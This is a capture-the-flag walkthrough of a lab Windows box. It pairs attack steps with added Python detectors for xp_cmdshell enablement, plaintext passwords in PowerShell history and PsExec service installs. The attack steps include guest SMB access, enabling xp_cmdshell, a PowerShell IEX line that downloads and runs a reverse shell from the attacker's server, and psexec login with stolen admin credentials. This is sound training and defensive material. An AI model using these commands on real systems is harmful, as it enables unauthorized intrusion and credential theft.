This is a walkthrough of the “Archetype” box found in tier 2 of the starting point section. It will not contain flag spoilers but will guide you through the steps taken to obtain the flags.
Difficulty: Very Easy
§ Enumeration
The enumeration phase aims to gather as much information about the target as possible that could help us gain initial access to the target system or systems.
Starting off, we are going to run a port scan with Nmap to see what ports are currently exposed by the target system:
| Command used: nmap -A -T4 -p- <ip-address>
We can see multiple open ports in this Nmap scan, but the most important ones for this lab are going to be ports 445 (SMB) and 1433 (SQL).
We are first going to investigate port 445 with a tool called smbclient to try to list the SMB shares. In the Nmap scan, we can see that guest authentication is allowed.
| Command used: smbclient -L \\\\<ip-address>\\
We are asked for a password, but simply pressing Enter logs us in as the guest user. We can see a total of four shares; three of them are hidden shares, indicated by the trailing dollar sign, and such shares also typically require authentication for access.
However, one share called “backups” is the odd one out, missing the dollar sign. This does not mean it is guaranteed to be accessible, since it could still be behind authentication, but let’s try accessing it anyway.
| Command used: smbclient \\\\<ip-address>\\backups
We can access the “backups” share as the guest user, and we can also see one file inside this SMB share, which at first glance looks like a config file of some sort. Let’s grab it and view its content!
Viewing the config file we found in the “backups” SMB share, we can see a set of credentials, specifically credentials for what appears to be a SQL service account.
§ Initial Access
We have now enumerated the SMB port found in our initial Nmap scan, and from that we found a set of SQL service credentials, which leads us into the initial access phase.
The initial access phase is exactly what it suggests: we are simply gaining a foothold inside the target system. It does not matter what our privileges are, as long as we can get inside.
Let’s get into it! We are going to use a tool from the Impacket suite called impacket-mssqlclient. It lets us establish a connection with a Microsoft SQL Server instance and perform various tasks, one of which is gaining unauthorized access to the underlying system by establishing a reverse shell.
| Command used: impacket-mssqlclient username@ip -windows-auth
We have now established a connection to the SQL instance. The useful thing about impacket-mssqlclient is that we can execute shell commands through the xp_cmdshell extended stored procedure, which is disabled by default, so we first need to enable it:
As we can see, after enabling it we can execute shell commands such as “whoami” to confirm that it works.
This also means we can establish a reverse shell: we host a reverse shell script on our own Python web server, download it onto the target through xp_cmdshell, and have it connect back to our netcat listener.
Starting by finding a reverse shell we can use, I ended up using this one:
• Reverse shell
And then I edited it to include my IP address and the port I want to use to establish the connection.
We now start our netcat listener on our port of choice and start the Python web server in the same directory that holds our reverse shell:
We are now ready to download the reverse shell onto the target system. Going back to our SQL connection, we use the following command to download the script and execute it in one step:
| Command used: xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://ip:port/revshell.ps1\")
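From the defender's side, the step that made the rest of this phase possible is the enabling of xp_cmdshell, and SQL Server records every sp_configure change in its error log as a standard "Configuration option '...' changed from X to Y" notice. The following Python example is added here and is not part of the original walkthrough or of Impacket: it scans constructed error-log lines (timestamps, spids and ordering are made up) and flags sensitive options that were switched on, so an alert fires when a SQL login pivots to operating-system commands the way this walkthrough does.

```python
import re
from typing import Dict, List

# Constructed SQL Server error-log excerpt. The message text follows the standard
# sp_configure notice SQL Server writes to its ERRORLOG; timestamps, spids and the
# order of events are made up for this example.
SAMPLE_ERRORLOG = """\
2024-01-15 10:02:11.10 spid52      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 10:02:11.11 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-01-15 10:05:40.00 spid60      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-01-16 08:00:00.00 spid51      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""

# Options that hand a SQL login operating-system level capabilities when enabled.
SENSITIVE_OPTIONS = {
    "xp_cmdshell": "high",
    "Ole Automation Procedures": "high",
    "show advanced options": "medium",  # prerequisite for toggling the two above
}

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<spid>spid\d+)\s+Configuration option '(?P<option>[^']+)' "
    r"changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def find_risky_config_changes(errorlog: str) -> List[Dict[str, str]]:
    """Return sensitive configuration options that were switched on (0 -> non-zero)."""
    hits = []
    for line in errorlog.splitlines():
        m = CONFIG_CHANGE.match(line)
        if not m:
            continue
        option = m["option"]
        if option in SENSITIVE_OPTIONS and m["old"] == "0" and m["new"] != "0":
            hits.append({
                "time": m["ts"],
                "spid": m["spid"],
                "option": option,
                "severity": SENSITIVE_OPTIONS[option],
            })
    return hits


def sessions_enabling_xp_cmdshell(hits: List[Dict[str, str]]) -> List[str]:
    """Sessions (spids) that enabled xp_cmdshell: the classic sign of a login pivoting to OS commands."""
    return sorted({h["spid"] for h in hits if h["option"] == "xp_cmdshell"})


if __name__ == "__main__":
    for hit in find_risky_config_changes(SAMPLE_ERRORLOG):
        print(f"[{hit['severity'].upper()}] {hit['time']} {hit['spid']} enabled '{hit['option']}'")
```

The "changed from 1 to 0" line is deliberately ignored: disabling the procedure is the desired state, and alerting on it would only add noise. In a real deployment the same parser would be pointed at the ERRORLOG files under the instance's Log directory, and the obvious mitigations are to keep xp_cmdshell disabled and to run the SQL Server service under a low-privilege account rather than one with local administrator rights.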
At this point we are logged in as a normal user without sufficient privileges, so we need to find a way of escalating our privileges to an administrator user.
§ Escalating Privileges
Now that we have gained initial access to the target system, the next step would be to find a way to escalate our privileges to become a more powerful user. For this, we are going to use a really common tool for Windows privilege escalation called winPEAS.
We are going to download the winPEASx64.exe file from this GitHub repository and place it inside the same folder in which we currently have a Python web server running.
After downloading winPEAS locally, we fetch the executable from our Python HTTP server onto the target system, into a directory we are allowed to read from and write to.
| Command used: Invoke-WebRequest -Uri "http://ip:port/winPEASx64.exe" -OutFile "winPEASx64.exe"
Now that we have downloaded winPEAS on the target system it's time to run it and see if we can find anything interesting!
| Command used: .\winPEASx64.exe
Going through the winPEAS results, we find a PowerShell history file which winPEAS has marked in red, meaning it “Indicates a special privilege over an object or something is misconfigured”. This file can contain plaintext passwords if they were typed as part of a command.
We can indeed confirm that this is exactly what happened here: the administrator used their credentials as part of a command and forgot to clear the PowerShell history file.
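The lesson for administrators is that PSReadLine keeps a per-user command history on disk, and any password typed inline ends up in it. The following Python example is added here and is not from the walkthrough or from winPEAS: it scans a constructed history file (every command, host name and credential in it is made up) for the common ways a password lands in a command line, and reports the offending lines with the secret redacted so the report itself does not become another copy of the password. The default history path it builds is the standard PSReadLine location under %APPDATA%; the rule names are my own.

```python
import os
import re
from typing import List, Tuple

# Constructed sample of a PSReadLine history file (ConsoleHost_history.txt).
# Every command, host name and credential below is made up for this example.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net use \\fileserver\share /user:CORP\backupadmin Winter2024!
$pass = ConvertTo-SecureString "Hunter2!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("admin", $pass)
Invoke-Command -ComputerName dc01 -Credential $cred -ScriptBlock { hostname }
sqlcmd -S localhost -U sa -P S3cretSa
exit
"""

# Default location of the PSReadLine history for the current user on Windows.
DEFAULT_HISTORY_PATH = os.path.join(
    os.environ.get("APPDATA", ""),
    "Microsoft", "Windows", "PowerShell", "PSReadLine", "ConsoleHost_history.txt",
)

# Each rule captures the secret itself so the report can redact it instead of echoing it.
SECRET_RULES = [
    ("net use /user: <password>",
     re.compile(r"\bnet\s+use\b.*?/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?[\"']?(?P<secret>[^\"'\s]+)[\"']?.*-AsPlainText", re.I)),
    ("-Password <literal>",  # a literal value; "-Password $var" is not flagged
     re.compile(r"-Password\s+[\"']?(?P<secret>[^\"'\s$][^\"'\s]*)", re.I)),
    ("sqlcmd -P <password>",  # sqlcmd flags are case-sensitive, so no re.I here
     re.compile(r"\bsqlcmd\b.*\s-P\s+(?P<secret>\S+)")),
]


def find_plaintext_secrets(history_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, redacted_line) for each history line that embeds a secret."""
    findings = []
    for lineno, line in enumerate(history_text.splitlines(), start=1):
        for rule_name, pattern in SECRET_RULES:
            m = pattern.search(line)
            if m:
                redacted = line.replace(m.group("secret"), "<REDACTED>")
                findings.append((lineno, rule_name, redacted))
                break  # one finding per line is enough for a hygiene report
    return findings


def scan_history_file(path: str = DEFAULT_HISTORY_PATH) -> List[Tuple[int, str, str]]:
    """Scan an on-disk history file; a missing file simply yields no findings."""
    if not os.path.isfile(path):
        return []
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_plaintext_secrets(fh.read())


if __name__ == "__main__":
    for lineno, rule_name, redacted in find_plaintext_secrets(SAMPLE_HISTORY):
        print(f"line {lineno}: {rule_name}: {redacted}")
```

Note that lines 4 and 5 of the sample are not flagged: passing a PSCredential object or a variable is exactly the pattern that keeps the password out of the history, which is the habit to encourage. When a hit is found, truncating the history file is only half the fix; the password has to be treated as exposed and rotated.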
Now that we know the administrator credentials, we can simply use Impacket’s psexec.py to log in as the administrator and establish a connection with the target system.
| Command used: psexec.py administrator@ip
We have now “rooted” the box, meaning we have gained access to the administrator account.
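On the detection side, PsExec-style tools work by installing a service on the target, which Windows records in the System log as Event ID 7045 ("A service was installed in the system"). The following Python example is added here and is not from the walkthrough or from Impacket: it classifies constructed 7045 records (hosts, names and paths are made up, and the field names are an assumption about how a SIEM normalises the event). The fixed PSEXESVC service name used by Sysinternals PsExec is a direct indicator; the Impacket implementation used above randomises its service and binary names, so the example falls back on a heuristic, assumed here and to be tuned against your own baseline, that flags a new LocalSystem service whose binary sits directly in the Windows directory.

```python
import re
from typing import Dict, List

# Constructed System-log Event ID 7045 records, flattened the way a SIEM might
# normalise them. Hosts, service names and paths are made up for this example.
SAMPLE_7045_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "service_name": "Spooler",
     "image_path": r"C:\Windows\System32\spoolsv.exe", "account": "LocalSystem"},
    {"host": "ARCHETYPE", "service_name": "PSEXESVC",
     "image_path": r"%SystemRoot%\PSEXESVC.exe", "account": "LocalSystem"},
    {"host": "ARCHETYPE", "service_name": "qKxZ",
     "image_path": r"%SystemRoot%\qKxZ.exe", "account": "LocalSystem"},
    {"host": "WS02", "service_name": "MyBackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe", "account": r"NT AUTHORITY\NetworkService"},
]

# Sysinternals PsExec registers its helper service under a fixed name.
KNOWN_REMOTE_EXEC_SERVICES = {"PSEXESVC"}

# Heuristic (assumed): a service binary dropped straight into the Windows directory,
# with no sub-folder, is how PsExec-style tools typically stage themselves, including
# the ones that randomise their names.
WINDOWS_ROOT_EXE = re.compile(
    r'^"?(?:%SystemRoot%|%windir%|[A-Za-z]:\\Windows)\\[^\\"]+\.exe"?', re.I
)


def classify_service_install(event: Dict[str, str]) -> str:
    """Return 'high', 'medium' or 'none' for one 7045 record."""
    if event["service_name"].upper() in KNOWN_REMOTE_EXEC_SERVICES:
        return "high"
    if WINDOWS_ROOT_EXE.match(event["image_path"]) and event["account"].lower() == "localsystem":
        return "medium"
    return "none"


def flag_remote_exec_services(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events worth a closer look, with their severity attached."""
    flagged = []
    for ev in events:
        sev = classify_service_install(ev)
        if sev != "none":
            flagged.append({**ev, "severity": sev})
    return flagged


if __name__ == "__main__":
    for ev in flag_remote_exec_services(SAMPLE_7045_EVENTS):
        print(f"[{ev['severity'].upper()}] {ev['host']}: service {ev['service_name']} -> {ev['image_path']}")
```

A hit on the ARCHETYPE host would be corroborated by the preceding events in this walkthrough: a guest SMB logon, a SQL login enabling xp_cmdshell, and an outbound connection from the SQL Server process. Correlating those in sequence is far more reliable than any single indicator, and a 7045 record for a service the change-management process does not know about deserves a look even when the heuristic alone would rate it medium.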
§ Flags
Now that we have gained administrator access we are going to grab both flags for this box:
Thank you for reading, hope this helped you in some way!